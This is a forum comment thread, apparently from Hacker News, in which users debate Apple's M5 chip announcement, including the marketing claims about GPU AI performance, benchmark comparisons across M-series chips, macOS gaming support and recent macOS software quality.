Speaking personally, I just wanted Apple to wait for WoW64 support to hit upstream. Their careless interruption of my Mac experience is why I ditched the ecosystem as a whole. If Apple cannot invest in making it a premium experience, I'll take my money elsewhere.

ascagnel_•2h ago
Apple's mistake was allowing 32-bit stuff on Intel in the first place -- if they had delayed the migration ~6 months and passed on the Core Duo for Core 2 Duo, it would've negated the need to ever allow 32-bit code on x86.
coffeeaddict1•3h ago
> an absolutely ancient OpenGL version

I still don't get this. Apple is a trillion-dollar company. How much does it cost to pay a couple of engineers to maintain an up-to-date version on top of Metal? Their current implementation is 4.1; it wouldn't cost them much to provide one for 4.6. Even Microsoft collaborated with Mesa to build a translation layer on top of DX12; Apple could do the same.

mandarax8•2h ago
Their current OpenGL 4.1 actually does run on top of Metal, making it even more blatantly obvious that they just don't want to.
astrange•1h ago
They can't do Khronos things because they don't get along with Khronos. Same reason they stopped having NVidia GPUs forever ago.
ryandrake•3h ago
The company in general never really seemed that interested in Games, and that came right from Steve Jobs. John Carmack made a Facebook post[1] several years ago with some interesting insider insights about his advocacy of gaming to Steve Jobs, and the lukewarm response he received. They just never really seemed to be a priority at Apple.

1: https://www.facebook.com/permalink.php?story_fbid=2146412825...

astrange•1h ago
It's impossible to care about video games if you live in SV because the weather is too nice. You can feel the desire to do any indoor activity just fade away when you move there. This is somehow true even though there's absolutely nothing to do outside except take walks (or "go hiking" as locals call it) and go to that Egyptian museum run by a cult.

Somehow Atari, EA and PlayStation are here despite this. I don't know how they did it.

Meanwhile, Nintendo is successful because they're in Seattle where it's dark and rains all the time.

zarzavat•19m ago
Gamedevs have not forgotten that Apple attempted to get Unreal Engine banned from all their platforms, thus rug pulling every game built on top of it.

It was only the intervention of Microsoft that managed to save Apple from their own tantrum.

insraq•3h ago
I wrote a post (rant)[1] about my experience of releasing a game on macOS as an indie dev. tl;dr: Apple goes a long way to make the process as painful as possible, with tons of paper cuts.

[1] https://ruoyusun.com/2023/10/12/one-game-six-platforms.html#...

Damogran6•3h ago
There's a cost/value calculation that just doesn't work well... I have a Ryzen 9 / RTX 3070 PC ($2k over time) and my M4 Mini ($450) holds its own for almost all normal user stuff... sprinting ahead for specific tasks (video codecs)... but the 6-year-old dedicated GPU on the PC annihilates the Mini at pushing pixels... You can spec an Apple that does better for gaming, but man, are you gonna pay for it, and it still won't keep up with current PC GPUs.

Now... something like Minecraft or Subnautica? The M4 is fine, especially if you're not pushing 4K 240Hz.

Apple has been pushing the gaming experience for years (iPhone 4S?) but it never REALLY seems to land, and when someone has a great gaming experience in a modern AAA game, they always seem to be using a $4500 Studio or similar.

yieldcrv•3h ago
It's kind of a myth though, Mac has many flagship games and everything in between

If you identify as a "gamer" and are in those communities, then you'll see communities talking about things you can't natively play

but if you step outside those niches, you already have everything

and with microtransactions, Apple ecosystem users are the whales. Again, not something that people who identify as "gamers" want to admit being okay with, but those people are not the revenue of game production.

so I would say it is a missed opportunity for developers operating on antiquated calculations of macOS deployment

bigyabai•13m ago
> It's kind of a myth though

It's kinda not. Here's a rough list of the 10 most-played games currently on PC: https://steamdb.info/charts/

macOS is supported by one title (DOTA 2). Windows supports all 10, Linux (the free OS, just so we're clear) runs 7 of the games and has native ports of 5 of them. If you want to go argue to them about missed revenue opportunities then be my guest, but something tells me that DOTA 2 isn't being bankrolled by Mac owners.

If you have any hard figures that demonstrate "antiquated calculations" then now is the time to fetch them for us. I'm somewhat skeptical.

croes•3h ago
Doesn't macOS favor a 60Hz output? Gamers prefer much higher rates.

And don't forget they made a VR headset without controllers.

Apple doesn't care about games.

jsheard•3h ago
> Doesn't macOS favor a 60Hz output?

Kind of? It does support higher refresh rates, but their emphasis on "Retina" resolutions imposes a soft limit, because monitors that dense rarely support much more than 60Hz, due to the sheer bandwidth requirements.
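
The numbers back that up: raw link bandwidth scales with pixels x refresh x bit depth, and dense "Retina" panels blow past what common links can carry at high refresh rates. A quick sketch (assuming 10-bit RGB and ignoring blanking overhead and DSC compression):

    def link_gbps(width, height, hz, bits_per_pixel=30):
        # Raw uncompressed video bandwidth in Gbit/s (10-bit RGB = 30 bpp).
        return width * height * hz * bits_per_pixel / 1e9

    for name, w, h, hz in [("4K @ 144Hz", 3840, 2160, 144),
                           ("5K @ 60Hz", 5120, 2880, 60),
                           ("5K @ 120Hz", 5120, 2880, 120)]:
        print(f"{name}: {link_gbps(w, h, hz):.0f} Gbps raw")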

mavbo•3h ago
I play a lot of World of Warcraft on my M3 MacBook Pro, which has a native macOS build. It's a CPU-bottlenecked game, with most users recommending the AMD X3D CPUs to achieve decent framerates in high-end content. I'm able to run said content at high (7/10) graphics settings at 120fps with no audible fan noise, for hours at a time, on battery. It's been night and day compared to previous Windows machines.
viktorcode•1h ago
The porting is not straightforward; you must switch to Metal, and you should adapt the rendering pipeline to tiled deferred shading.
jajuuka•9m ago
Multiple solid reasons have been mentioned, from ones created by Apple to ones enforced in software by Apple. One that hasn't been mentioned is the lack of market share. The macOS market is just tiny and very limited. It's also not a growing market. PC gaming isn't blowing up either, but the number of players is simply higher.

Ports to macOS have not done well, from what I've heard. On PC, however, you can see ports do really well, which has encouraged studios like Sony and Square Enix to invest more in PC ports, even much later, after the console versions sell well. There are just not a lot of reasons to add the tech debt and complexity of supporting the Mac as well.

Even big publishers like Blizzard, who were Mac devs for a long time, axed the dedicated Mac team and client and moved to a unified client. This has downsides, like Mac-specific issues; if those are not critical, they get put in the pile with the rest of the bugs.

jdc0589•3h ago
This is cool and all, but what I'm really excited about is the possibility that one day they'll update their laptops so the keys stop leaving marks on the screen.

I know we are a few major scientific breakthroughs away from that even being remotely possible, but it sure would be nice.

maxk42•3h ago
For my use case I need MSL to support FP64. Until that happens I don't care what hardware changes they make: I'm not going to be filling racks with M5s, and they're not producing something I can even use to tinker with AI in my spare time. Apple has lost the AI war before it even got started, IMO.
mrbonner•3h ago
I'm waiting for the day when the iPhone is equipped with an M chip. Not too long a wait, I hope.
paxys•3h ago
M5 is 4-6x more powerful than M4, which was 5x more powerful than M3, which was 4x more powerful than M2, which was 4x more powerful than M1, which itself was 6x faster than an equivalent Intel processor. Great!

Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago.

So, where is the disconnect here? Why is actual user experience not able to keep up with benchmarks and marketing?

vintagedave•3h ago
What scares me is that my M2 started seeing performance issues in macOS recently. Safari is sometimes slow (I admit I stress it with many tabs, but it wasn't like this a year ago). Somehow graphics in general seem slower on Tahoe, e.g. the effects when minimizing a window.

I am deeply concerned all the performance benefits of the new chips will get eaten away.

conradev•3h ago
That is certainly inevitable, it's just a question of when: https://en.wikipedia.org/wiki/Wirth%27s_law
MobiusHorizons•3h ago
You are probably actually witnessing the reduced performance of swap as your drive fills up. Check the memory pressure in Activity Monitor. The fix is pretty easy (delete stuff).
vintagedave•2h ago
Thanks, but I have over a hundred gigs free. And I got the max RAM I could (24GB). I feel like the machine _should_ be capable in 2025.
Tagbert•2h ago
26.0 is very much a dot-zero release. It is missing a lot of optimizations and there are some open bugs like memory leaks. Initial reports on 26.1 show a lot of improvement in those. The 3rd beta of 26.1 just came out yesterday. They will probably launch this new version with improved optimizations by end of October.
tmountain•3h ago
Probably synthetic benchmarks that don't represent actual bottlenecks in application usage. How much of what you are doing is actually CPU bound? Your machine still has to do I/O, and even though that's "very fast" these days, it's not happening inside your CPU, so you'll only see the actual improvements when running workloads that benefit from the performance improvements (i.e., complex calculations that can live in the CPU and its cache).
monocasa•3h ago
Each is a different specific benchmark, so they don't stack the way you're doing.

This is 4-6x faster in AI for instance.

tylerhou•3h ago
> M5 is 4-6x more powerful than M4

In GPU performance (probably measured on a specific set of tasks).

condiment•3h ago
It's GPU performance.

Spin up ollama and run some inference on your 5-year-old intel macbook. You won't see 4000x performance improvement (because performance is bottlenecked outside of the GPU), but you might be in the right order of magnitude.

jandrese•3h ago
Comparing GPU performance to some half decade old Intel IGP seems like lying with statistics.

"Look how many times faster our car is![1]"

[1] Compared to a paraplegic octogenarian in a broken wheelchair!

umanwizard•3h ago
Well, Apple isn’t making that comparison, the OP was.
blihp•3h ago
Not possible given the anemic memory bandwidth [1]... you can scale up the compute all you want but if the memory doesn't scale up as well you're not going to see anywhere near those numbers.

[1] The memory bandwidth is fine for CPU workloads, but not for GPU / NN workloads.

tester756•3h ago
Because this is bullshit, lies, marketing
freehorse•3h ago
They are not 4x more powerful than the previous generation at everything, or even at the same thing every time, so it does not stack up that way. Here, 4x refers to something about LLMs running on the GPU.

I use both an M1 Max and an M3 Max, and frankly I do not notice much difference in most stuff if you control for the core count. And for running LLMs they have almost the same performance. I think from M1 to M3 there was not much performance increase in general.

random3•3h ago
The disconnect is that you're reading sideways.

First line on their website:

> M5 delivers over 4x the peak GPU compute performance for AI compared to M4

It's the GPU, not the CPU (which is what you compare with your old Intel), and it's an AI workload, not your regular workload (which, again, is what you compare).

bangaladore•3h ago
And they are comparing peak compute. Which means essentially nothing.
random3•2h ago
There was a time when Apple decided that throwing around random technical numbers shouldn't be the news (that followed the megahertz-counting era). These times have been changing post-Steve Jobs. That said, this is a chip announcement rather than a product announcement, so maybe that is the news.
edmundsauto•2h ago
They also lost big during the megahertz wars. Consumers made it clear that they wanted to see the number go up, and they voted with their wallets. There is probably still some cultural remnant of that era.
tempodox•2h ago
Do not trust any statistics you did not fake yourself.
james4k•3h ago
Those marketing claims are each about a very specific workload, not about general performance. Yes, it is often misleading.
Jnr•3h ago
It states it is "peak performance", probably in a very specific use case. Or maybe it reaches the peak for an extremely short period of time before performance drops.
thebitguru•3h ago
Apple has also seemingly stopped caring about the quality and efficiency of their software. You can see this especially in the latest iOS/iPadOS/macOS 26 versions of their operating systems. They need their software leadership to match their hardware leadership, otherwise good hardware with bad software still leads to bad product, which is what we are seeing now.
taf2•2h ago
I think 15.6.1 (24G90) will be my last macOS... Omarchy is blazing fast.
drcongo•2h ago
I see this sentiment a lot, but I've found the OS26 releases to be considerably better than the last few years' OS releases, especially macOS which actually feels coherent now compared to the last few years of janky half baked UI.
cmcaleer•2h ago
It is frankly ridiculous how unintuitive it was to add an email account to Mail on iOS. This is possibly the most basic functionality I would expect an email client to have. One would expect that they go to their list of mailboxes and add a new account.

No. You exit the mail app -> Go to settings -> apps -> scroll through a massive list (that you usually just use for notification settings btw) to go to mail -> mail accounts -> add new account.

Just a simple six-step process after you’ve already hunted for it in the mail app.

jrmg•2h ago
There’s an “Accounts...” entry in the main “Mail” menu.

You can also click the “+” button at the bottom of the list of accounts in the “Accounts” panel in Mail's settings window.

ant6n•2h ago
I think the most basic email integration I want from Apple is the ability to set up another email program besides "Mail" as the default, without having to set up Mail first.
heresie-dabord•2h ago
> Apple has also seemingly stopped caring about the quality and efficiency of their software.

Hardware has improved significantly, but it needs software to enable me to enjoy using it.

Apple is not the only major company that has completely abandoned the users.

The fastest CPUs and GPUs with the most RAM will not make me happier being targeted by commercial surveillance mechanisms, social-media applications, and hallucinating LLM systems.

Rover222•1h ago
iOS 26 is so bad. It's the first time I've really felt annoyed daily when using an Apple device. Basically on par with my Android experiences now.
justinator•3h ago
You know, 64% of statistics are made up.
cj•3h ago
I’m not sure I see the disconnect.

At our company we used to buy everyone MacBook Pros by default.

After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order MacBook Airs for new employees.

I feel like until recently, you really needed a MBP to get a decent UX (even just using chrome). But now there doesn’t seem to be a major compromise when buying an Air for half the price, at least compared to 3-5 years ago.

wlesieutre•2h ago
What's crazy about that to me is the Macbook Air doesn't even have a fan. The power efficiency of the ARM chips is really something.
charliebwrites•2h ago
Anecdotal, but I switched to an M3 MBA from an M1 MBP for my iOS and other dev related work

I’ve had zero problems with lag or compile time (prior to macOS 26 anyway)

The only thing it can't do is run Ableton in a low-latency way without heavily changing the defaults

You press a key on the keyboard to play a note and half a second later you hear it

Other than that, zero regrets

cyberpunk•2h ago
That's weird, my M1 Air handles Ableton absolutely fine.

Something's off with your setup.

hartator•2h ago
> After the M-series chip, the MBPs are just too powerful and no longer necessary for the average white collar worker (they seem like “actual” pro machines, now) to the point where we now order regular MacBooks (not Pro’s) for new employees

Regular MBs are not really a thing anymore. You mean Airs?

cj•2h ago
Yes, fixed!
ahmeneeroe-v2•2h ago
Absolutely true. I now know that I only need an MBA, not an MBP.
hibikir•21m ago
In 2021, we bought everyone M1 Pros with 32 gigs of RAM. Historically, keeping a developer on a 4-year-old laptop would have been crazy, but nobody is really calling for upgrades like we did back when we got rid of the Intels.
semiinfinitely•3h ago
All those extra flops are spent computing light refraction in the liquid glass of the ui
quitit•2h ago
You wrote:

>Looking at my Macbook though, I can say with utmost certainty that it isn't 4000x faster than the Intel one I had 5 years ago. So, where is the disconnect here?

They wrote:

> Together, they deliver up to 15 percent faster multithreaded performance over M4

The problem is comprehension, not marketing.

CryptoBanker•2h ago
I think you’re the one misreading here. The 15% refers to CPU speed while the 6x, etc. multiples refer to GPU speed
graeme•1h ago
GPU for ai workloads. That plausibly is that much faster as the intel laptops with integrated GPUs weren't made for that workload.
Choco31415•2h ago
Not quite. The announcement mentions that:

“M5 delivers over 4x the peak GPU compute performance for AI”

In this situation, at least, it’s just referring to AI compute power.

teaearlgraycold•12m ago
Much of this is probably down to optimized transformer kernels.
foota•2h ago
User experience (for most things, unless you sit there encoding video all day) isn't really related to raw performance so much as latency. Processor power can help there, but design and, at the limit, memory latency are the key constraints.
oulipo2•2h ago
Agreed, if I have 40 tabs open in Chrome, my M1 MacBook is no longer responsive... I'm not sure about their performance claims, apart from some niche GPU rendering for games, which constitutes about 0% of my daily laptop usage.
0x457•2h ago
Well, if you read the very next thing after 4x, you will notice it says "the peak GPU compute performance for AI compared to M4".

The disconnect here is that you can't read. Sorry, no other way to say it.

potatolicious•2h ago
Because there's more to "actual user experience" than peak CPU/GPU/NPU workload.

Firstly, the M5 isn't 4-6x more powerful than M4 - the claim is only for GPU, only for one narrow workload, not overall performance uplift. Overall performance uplift looks like ~20% over M4, and probably +100% over M1 or so.

But there is absolutely a massive sea change in the MacBook since Intel 5 years ago: your peak workloads haven't changed much, but the hardware improvements give you radically different UX.

For one thing, the Intel laptops absolutely burned through the battery. Five years ago the notion of the all-day laptop was a fantasy. Even relatively light users were tethered to chargers most of the day. This is now almost fully a thing of the past. Unless your workloads are very heavy, it is now safe to charge the laptop once a day. I can go many hours in my workday without charging. I can go through a long flight without any battery anxiety. This is a massive change in how people use laptops.

Secondly is heat and comfort. The Intel Macs spun their fans up at even mild workloads, creating noise and heat - they were often very uncomfortably warm. Similar workloads are now completely silent with the device barely getting warmer than ambient temp.

Thirdly is allowing more advanced uses on lower-spec and less expensive machines. For example, the notion of rendering and editing video on a Intel MacBook Air was a total pipe dream. Now a base spec MacBook Air can do... a lot that once forced you into a much higher price point/size/weight.

A lot of these HN conversations feel like sports car fans complaining: "all this R&D and why doesn't my car go 500mph yet?" - there are other dimensions being optimized for!

leakycap•1h ago
> So, where is the disconnect here?

> I can say with utmost certainty that it isn't 4000x faster

The numbers you provided do not come to 4000x faster (closer to 2400x)

> Why is actual user experience not able to keep up with benchmarks and marketing?

Benchmarks and marketing are very different things, but you seem to be holding them up as similar here.

The 5x, 6x, 4x numbers you describe span many years of marketing and don't even refer to the same thing. You're giving numbers with no context, which implies you're mixing them up; the marketing worked, because the only thing you're recalling is the big number.

Each M-series chip is a HUGE advancement over the last in GPU terms. Most of the "5x" performance jumps you describe are in graphics processing, and the "Intel" they're comparing against is often an Intel iGPU like the Iris Xe or UHD series. These were low-end trash iGPUs even when Apple launched those Intel devices, so part of why the 5x looked impressive when the M1 came out is that the Intel Macs had such terrible integrated graphics.

The M1 was a giant jump in overall system responsiveness, and the M-series seems to be averaging about a 20% year over year meaningful speed increase. If you use AI/ML/GPU, the M-series yearly upgrade is even better. Otherwise, for most things it's a nice and noticeable bump but not a Intel-to-M1 jump even from M1-to-M4.

omikun•1h ago
Says M5 is 4x faster than M4 and 6x faster than M1 for AI compute on the GPU. Basically M4 was only a little faster than M1 at this task. Ex. if M5 is 24 AI TOPS, M4 is 6 AI TOPS, and M1 is 4 AI TOPS.

Unless you're looking at your MacBook running LM Studio you won't be seeing much improvement in this regard.

pzo•3h ago
This is quite a weird and confusing move (probably on purpose). The M5 is being released in a MacBook Pro, but the previous MacBook Pro had an M4 Pro or M4 Max, so this one is more like the MacBook Air series, or even the iPad Pro series.

They say "M5 offers unified memory bandwidth of 153GB/s, providing a nearly 30 percent increase over M4", but my old MacBook M2 Max has 400GB/s.

rcarmo•3h ago
I'll take one inside an iPad mini, thank you very much.
mattray0295•2h ago
They push these new generations out so quickly, and with crazy performance boosts. Impressive.
mrlonglong•2h ago
Good old Brits, taking over the world with an ISA so extraordinarily efficient that, at its inception, they discovered the processor kept operating on leakage currents even though the power was off.

From: https://www.theregister.com/2012/05/03/unsung_heroes_of_tech...

"> The power test tools they were using were unreliable and approximate, but good enough to ensure this rule of thumb power requirement. When the first test chips came back from the lab on the 26 April 1985, Furber plugged one into a development board, and was happy to see it working perfectly first time.

> Deeply puzzling, though, was the reading on the multimeter connected in series with the power supply. The needle was at zero: the processor seemed to be consuming no power whatsoever.

> As Wilson tells it: “The development board plugged the chip into had a fault: there was no current being sent down the power supply lines at all. The processor was actually running on leakage from the logic circuits. So the low-power big thing that the ARM is most valued for today, the reason that it's on all your mobile phones, was a complete accident."

> Wilson had, it turned out, designed a powerful 32-bit processor that consumed no more than a tenth of a Watt."

busymom0•2h ago
> M5 brings its industry-leading power-efficient performance to the new 14-inch MacBook Pro, iPad Pro, and Apple Vision Pro

Not for Mac mini?

supernes•1h ago
They'll put it in the Mini when they push out a new Studio to upsell to.
looneysquash•2h ago
That's cool, but so much software only supports CUDA.
allenrb•2h ago
I’d like a filter to remove all mention of AI and associated performance from copy like this. Maybe I can build it with… nvm.

Seriously, can’t you tell me about the CPU cores and their performance?

wina•1h ago
Why do you want more CPU cores and better performance than the M4, if not for running local AI models?
adastra22•1h ago
CPU cores aren't relevant to running AI?
sib•1h ago
Photo & video post-processing...
Remnant44•1h ago
Essentially every other use case for a computer.

Whether you're playing games, or editing videos, or doing 3D work, or trying to digest the latest bloated react mess on some website.. ;)

LarsDu88•1h ago
It's disappointing to me how far behind other chipmakers are on a unified GPU/CPU memory bus. Only AMD's Strix Halo even attempts this. Well, this announcement tipped my hand and I'm finally buying a new MacBook :)
hereme888•1h ago
Base models only:

- M1 | 5 nm | 8 (4P+4E) | GPU 7–8 | 16-core Neural | Memory Bandwidth: 68.25 GB/s | Unified Memory: 16 GB | Geekbench6 ~2346 / 8346

- M2 | 5 nm (G2) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2586 / 9672

- M3 | 3 nm (first-gen) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2965 / 11565

- M4 | 3 nm (second-gen) | 10 (4P+6E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 120 GB/s | Unified Memory: 32 GB | Geekbench6 ~3822 / 15031

- M5 | 3 nm (third-gen) | 10 (4P+6E) | GPU 10 | 16-core Neural | Memory Bandwidth: 153 GB/s | Unified Memory: up to 32 GB | Geekbench6 ~4133 / 15437 (9-core sample)

gigatexal•1h ago
Amazing. My M3 Max is going to look like a paperweight very soon. And that's fine by me. When I get an M6 or M7 Max to replace it, it'll be amazing.
bombcar•1h ago
I’m trying to find any reason I can that my M1 Max needs replacement; it’s hard. How do you justify it?
alexeldeib•57m ago
Fun one: https://incident.io/blog/festive-macbooks
nu11ptr•47m ago
I am in the same boat, as my Rust compile times are solid. I'm good for now, but with the M4 Max twice as fast, the M5 Max next year could be a tempting upgrade.
djtriptych•43m ago
Same. I have an M1 Max Studio and it's just laughing at the little workloads I throw at it (pro photo editing, music production, software dev, generally all at the same time).

It just never sweats AT ALL - it feels like a decade from obsolescence based on what I'm doing now.

It would have to be an order of magnitude faster for me to even notice at this point.

oblio•39m ago
You're not opening enough Chrome tabs. Or Electron apps.
andrepd•34m ago
You're clearly running low-intensity tasks (pro photo editing, music production, software dev, generally all at the same time) instead of highly-demanding ones (1 jira tab)
zahirbmirza•28m ago
Obsolescence for Macs comes when Apple decides not to allow your Mac to update to the latest OS.
phony-account•22m ago
> Obsolescence for Macs comes when Apple decides not to allow your Mac to update to the latest OS.

That doesn’t make it obsolete, at all.

poultron•21m ago
Obsolescence comes when Apple conveniently "optimizes" a new OS architecture for a new chip... that conveniently, ironically, somehow severely de-optimizes things for the old chips... and suddenly that shiny new OS feels slow and sluggish and clunky and "damn, I need to upgrade my computer!" They'll whitewash it not as planned obsolescence but as optimization for new products. It doesn't have to be that way, and shouldn't be, but it's incredibly profitable.
MPSimmons•13m ago
Maybe by that time ARM Linux on this platform will be excellent and we can migrate to it for old gear. I still have a 2011 MBP running Linux on my electronics workbench, and it is just fine.
montebicyclelo•27m ago
On the contrary; now might be a good time to get an M1 Max laptop. A second-hand one, ex-corporate, in good condition, with 64GB RAM, is pretty good value compared to new laptops at the same price. It's still a fantastic CPU.
smith7018•2m ago
You should wait until next Fall if you don't really need to replace your M1 Max. Rumors say that Apple's going to redesign the Macbook Pros next year with an OLED screen.
rootusrootus•12m ago
I was thinking similar thoughts about my M2 Max MBP. I look at the newer chips and wonder at what point the base M chip will outperform my M2 Max (or has it happened already?). I'll probably hold onto it a while anyway; I think it will be a while before I find 96GB limiting or the CPU slow enough for my purposes, but I'd still like to know how things are progressing.
B1FF_PSUVM•1h ago
Thank you. Looking at replacing an Intel MacBook Air, I hope there are price drops on the "outdated" M4s (although an M2 phased out early this year would do well enough...)
nu11ptr•1h ago
The step down from 32GB to 24GB of unified memory is interesting. Theories? Perhaps they decided M4 allowed too much memory in the standard chip and they want to create a larger differential with Pro/Max chips?

Update: I am thinking the 24GB for the M5 is a typo. I see on Apple's site that the 14-inch MBP can optionally be configured with 32GB of RAM.

makeramen•1h ago
That seems like a typo or incorrect info; the M5 MBP definitely can be configured up to 32 GB, and the Apple page mentions 32 GB explicitly as well.
christkv•1h ago
They still have an option for 32GB.
eftychis•1h ago
I had the same question, but I can only speculate at the moment. The cynical part of me thinks along similar lines: create artificial differentiation and push people to upgrade.

If anyone has any real clues that they can share pseudonymously, that would be great. Not sure which department drove that change.

ElijahLynn•1h ago
Thank you! Since this is the top rated comment, can you also add M1 and M2 as well?
rick_dalton•42m ago
The multi-core Geekbench score for the M5 is from the 9-core version, IIRC. The 10-core score isn't out yet, as far as I know.
morshu9001•39m ago
And the fastest M4 Max was already the fastest single- and multi-core CPU by a decent margin, while the fastest non-Apple CPUs were only specialized for one or the other.
jjcm•39m ago
They're going to have a hard time selling the M5 when compared to the M4 Pro. Geekbench for that chip is 3843/22332, which is slightly slower single-core but better multi-core, and those machines also have Thunderbolt 5 instead of 4.
GeekyBear•29m ago
The numbers for M5 Geekbench are for the binned iPad Pro version with one performance core disabled.

It's the only M5 device that leaked to the public early.

jay_kyburz•8m ago
Serious questions. How is Asahi these days? Is it ready as a daily driver? Is it getting support from Apple or are they hostile to it? Are there missing features? And can I run KDE on it?
jay_kyburz•5m ago
Never mind. Found this. Still a ways to go. https://asahilinux.org/docs/platform/feature-support/m4/#tab...
t1234s•1h ago
Any reason they don't have an Apple TV Pro with an M-series chip that's targeted towards gaming?
quentindanjou•59m ago
I think it is because there are not enough games to justify integrating an M-series chip.
textlapse•1h ago
I wonder how much of the Nvidia DGX Spark announcement was meant to precede this M5 announcement by a day or two; the M5 MBP has higher performance, comes with a screen attached, and has a (bit) lower price tag.

If you could yank the screen out, it probably evens out :)

I have seen quite a few competitor announcements land this close together, and I wonder if companies use competitive analysis to get out a few days ahead of the Goliath (like Google vs. the rest, Apple vs. the rest, etc.).

ChuckMcM•59m ago
I think it would be amazing to be able to buy an M5 based open platform.
mgaunard•54m ago
Why is Apple focusing on AI? Do they have any AI products like Google, Meta, or OpenAI?
drnick1•32m ago
A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux. I simply don't want to live in Apple's walled garden.

Then there is the whole ARM vs x86 issue. Even if a compatible Linux distro were made, I expect to run all kinds of software on my desktop rig, including games, and ARM is still a dead end for that. For laptops, it's probably a sensible choice now, but we're still far from a truly free and usable ARM desktop.

anteloper•9m ago
I can't find a single Moore's law chart that includes 2025 data (they all seem to cut off around 2020, actually).

Does anyone know if we're still on pace with Moore's law?

umvi•5m ago
I would buy a Mac mini with an M-series chip in the blink of an eye if merely upgrading the RAM didn't double the cost of the unit.